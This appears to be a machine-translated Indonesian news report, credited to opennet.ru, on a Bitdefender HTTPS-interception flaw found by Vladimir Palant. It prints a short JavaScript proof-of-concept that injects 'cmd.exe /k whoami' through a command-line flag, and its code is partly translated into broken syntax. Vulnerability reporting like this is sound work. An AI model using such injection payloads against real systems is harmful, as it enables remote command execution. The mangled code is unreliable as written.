Vladimir Palant, pencipta Adblock Plus,
Penyebab masalahnya adalah antivirus Bitdefender melakukan intersepsi lokal terhadap lalu lintas HTTPS dengan mengganti sertifikat TLS asli situs tersebut. Sertifikat root tambahan diinstal pada sistem klien, yang memungkinkan untuk menyembunyikan pengoperasian sistem inspeksi lalu lintas yang digunakan. Antivirus ini memasukkan dirinya ke dalam lalu lintas yang dilindungi dan memasukkan kode JavaScript-nya sendiri ke beberapa halaman untuk mengimplementasikan fungsi Pencarian Aman, dan jika ada masalah dengan sertifikat koneksi aman, ia akan mengganti halaman kesalahan yang dikembalikan dengan miliknya sendiri. Karena halaman kesalahan baru disajikan atas nama server yang dibuka, halaman lain di server tersebut memiliki akses penuh ke konten yang dimasukkan oleh Bitdefender.
Saat membuka situs yang dikendalikan oleh penyerang, situs tersebut dapat mengirimkan XMLHttpRequest dan berpura-pura mengalami masalah dengan sertifikat HTTPS saat merespons, yang akan menyebabkan kembalinya halaman kesalahan yang dipalsukan oleh Bitdefender. Karena halaman kesalahan dibuka dalam konteks domain penyerang, ia dapat membaca konten halaman palsu dengan parameter Bitdefender. Halaman yang disediakan oleh Bitdefender juga berisi kunci sesi yang memungkinkan Anda menggunakan API Bitdefender internal untuk meluncurkan sesi browser Safepay terpisah, menentukan tanda baris perintah arbitrer, dan untuk meluncurkan perintah sistem apa pun menggunakan β--utility-cmd-prefixβ bendera. Contoh eksploitasi (param1 dan param2 adalah nilai yang diperoleh dari halaman kesalahan):
var permintaan = XMLHttpRequest baru();
permintaan.open("POST", Math.random());
request.setRequestHeader("Jenis konten", "aplikasi/x-www-form-urlencoded");
request.setRequestHeader(Β«BDNDSS_B67EA559F21B487F861FDA8A44F01C50Β», param1);
request.setRequestHeader(Β«BDNDCA_BBACF84D61A04F9AA66019A14B035478Β», param2);
request.setRequestHeader(Β«BDNDWB_5056E556833D49C1AF4085CB254FC242Β», Β«obk.runΒ»);
request.setRequestHeader(Β«BDNDOK_4E961A95B7B44CBCA1907D3D3643370DΒ», location.href);
request.send("data:teks/html,nada βutility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Mari kita ingat kembali penelitian yang dilakukan pada tahun 2017
Hanya 11 dari 26 produk yang menyediakan cipher suite saat ini. 5 sistem tidak memverifikasi sertifikat (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Produk Kaspersky Internet Security dan Total Security menjadi sasaran serangan
Sumber: opennet.ru